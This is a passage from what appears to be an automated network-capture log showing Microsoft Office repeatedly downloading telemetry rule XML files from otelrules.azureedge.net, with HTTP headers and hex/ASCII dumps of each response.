                                                                                                                                            2024-10-31 16:13:19 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            117192.168.2.44987413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:19 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:19 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:19 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1390
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                            x-ms-request-id: 93439f28-801e-00ac-63f6-2afd65000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161319Z-16849878b78x6gn56mgecg60qc0000000bk000000000f5u7
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:19 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            118192.168.2.44987513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:19 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:19 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:19 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1401
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                            x-ms-request-id: ee736da1-b01e-001e-7be0-260214000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161319Z-17c5cb586f6tg7hbbt0rp19dan00000001yg00000000neux
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:19 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            119192.168.2.44987613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:19 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:20 UTC517INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:20 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1364
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                            x-ms-request-id: ea4f12d2-001e-0066-30b1-2a561e000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161320Z-159b85dff8fj5jwshC1DFW3rgc00000001pg000000001pad
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:20 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            120192.168.2.44987713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:20 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:20 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1391
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                            x-ms-request-id: 92eac08a-601e-0001-29b2-26faeb000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161320Z-16849878b78qf2gleqhwczd21s0000000a1g0000000034da
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:20 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            121192.168.2.44987813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:20 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:20 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1354
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                            x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161320Z-16849878b78km6fmmkbenhx76n000000094g000000009w7b
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:20 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            122192.168.2.44987913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:20 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:20 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1403
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                                            x-ms-request-id: a1e8ab16-701e-0050-601c-266767000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161320Z-16849878b78g2m84h2v9sta29000000008kg00000000t7k7
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:20 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            123192.168.2.44988013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:20 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:20 UTC517INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:20 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1366
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                                            x-ms-request-id: 548bc1da-901e-0067-71ad-29b5cb000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161320Z-159b85dff8fdthgkhC1DFWk0rw00000001t00000000044hs
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:20 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            124192.168.2.44988213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:21 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:21 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:21 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1403
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                            ETag: "0x8DC582BDC2EEE03"
                                                                                                                                            x-ms-request-id: 19ae2231-801e-007b-0d9c-27e7ab000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161321Z-16849878b78qg9mlz11wgn0wcc00000009e00000000025z2
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:21 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            125192.168.2.44988113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:21 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:21 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:21 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1399
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                            ETag: "0x8DC582BE8C605FF"
                                                                                                                                            x-ms-request-id: c3d8694b-101e-0046-45a3-2691b0000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161321Z-16849878b78tg5n42kspfr0x4800000009u00000000094w7
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:21 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            126192.168.2.44988313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:21 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:21 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:21 GMT
                                                                                                                                            Content-Type: text/xml
